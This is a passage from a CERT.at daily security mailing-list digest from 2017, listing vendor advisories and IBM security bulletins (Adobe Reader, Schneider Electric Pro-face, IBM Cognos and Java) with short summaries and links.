∗∗∗ --------------------------------------------- Der Netzwerkausrüster stellt elf Sicherheitsupdates für diverse Produkte bereit. Von den Lücken soll ein mittleres bis hohes Risiko ausgehen. --------------------------------------------- https://heise.de/-3793025 ===================== = Advisories = ===================== ∗∗∗ Upcoming Security Updates for Adobe Reader and Acrobat (APSB17-24) ∗∗∗ --------------------------------------------- A prenotification Security Advisory has been posted regarding upcoming Adobe Reader and Acrobat updates scheduled for Tuesday, August 8, 2017. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1478 ∗∗∗ Schneider Electric Pro-face GP-Pro EX ∗∗∗ --------------------------------------------- This advisory contains mitigation details for an uncontrolled search path element vulnerability in Schneider Electric’s Pro-face GP-Pro EX. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-215-01 ∗∗∗ IBM Security Bulletin: A vulnerability in libtirpc affects PowerKVM ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=isg3T1025258 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security SiteProtector System ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22004331 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere Extreme Scale ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22005297 ∗∗∗ IBM Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos TM1 ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006551 ∗∗∗ IBM Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos Insight ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006550 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily